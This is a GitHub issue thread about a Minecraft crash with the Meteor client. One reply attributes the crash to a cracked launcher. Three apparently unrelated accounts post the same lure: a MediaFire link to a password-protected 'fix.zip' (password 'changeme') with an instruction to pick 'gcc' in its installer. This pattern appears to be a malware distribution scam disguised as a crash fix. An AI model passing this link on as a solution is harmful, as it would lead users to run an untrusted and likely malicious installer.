### ISSUE TITLE
How to fix | skibidi

### ISSUE THREAD

**Issue by Noeggnolife** [MeteorDevelopment/meteor-client#4861]
### Steps to reproduce

how to fix

![Untitled](https://github.com/user-attachments/assets/35d29980-a6c4-46f8-8c8a-7e13547a27a0)

### Link to crash report/log (upload to https://mclo.gs and paste resulting link here)

https://mclo.gs/DQv6CKt

### Meteor Version

meteor 0.5.8

### Minecraft Version

1.21.1

### Operating System

Windows

### Before submitting a crash report

- [X] This crash wasn't already reported (I have searched crash reports on GitHub).

- [X] This is a valid crash (I am able to reproduce this on the latest dev build).

**Comment by TechHorizon2003** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Big-Iron-Cheems** [comment]
> `YggdrasilMinecraftSessionService`

Buy the game and don't use a cracked launcher. 
Meteor doesn't support cracked users.

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
